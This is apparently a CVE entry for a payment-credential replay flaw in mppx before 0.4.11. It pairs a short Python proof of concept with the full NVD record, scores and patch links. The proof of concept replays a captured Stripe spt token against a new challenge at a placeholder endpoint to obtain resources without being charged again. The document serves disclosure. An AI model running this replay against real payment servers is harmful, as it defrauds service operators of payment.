CVE-2026-34210

# Conceptual Proof of Concept for CVE-2026-34210 # This script demonstrates the replay logic of a valid spt token. import requests # The attacker captures a valid spt token from a previous successful payment # In a real attack, this is obtained by intercepting the client's traffic. replay_spt_token = "spt_valid_token_abc123" # The target endpoint that requires payment verification target_api = "https://victim-api.com/mppx/verify" # New challenge ID for a resource the attacker wants to access new_challenge = "resource_challenge_xyz" # Construct the payload using the OLD token for the NEW challenge # Vulnerable versions of mppx (< 0.4.11) will not check Stripe's Idempotent-Replayed header payload = { "challenge": new_challenge, "method": "stripe", "credential": replay_spt_token } print("[*] Attempting to replay payment credential...") response = requests.post(target_api, json=payload) if response.status_code == 200: print("[+] Success! Server accepted the replayed credential.") print("[+] Resource granted without charging the account again.") else: print("[-] Replay failed.")

{"cve": {"id": "CVE-2026-34210", "sourceIdentifier": "[email protected]", "published": "2026-03-31T15:16:18.207", "lastModified": "2026-04-03T16:17:49.840", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "mppx is a TypeScript interface for machine payments protocol. Prior to version 0.4.11, the stripe/charge payment method did not check Stripe's Idempotent-Replayed response header when creating PaymentIntents. An attacker could replay a valid credential containing the same spt token against a new challenge, and the server would accept the replayed Stripe PaymentIntent as a new successful payment without actually charging the customer again. This allowed an attacker to pay once and consume unlimited resources by replaying the credential. This issue has been patched in version 0.4.11."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-697"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wevm:mppx:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "0.4.11", "matchCriteriaId": "72D62258-34DE-453F-8DFC-D25FA285D537"}]}]}], "references": [{"url": "https://github.com/wevm/mppx/commit/b2b1a0b60506fc71aa80b8a025084949dca1a994", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/wevm/mppx/releases/tag/[email protected]", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/wevm/mppx/security/advisories/GHSA-8mhj-rffc-rcvw", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}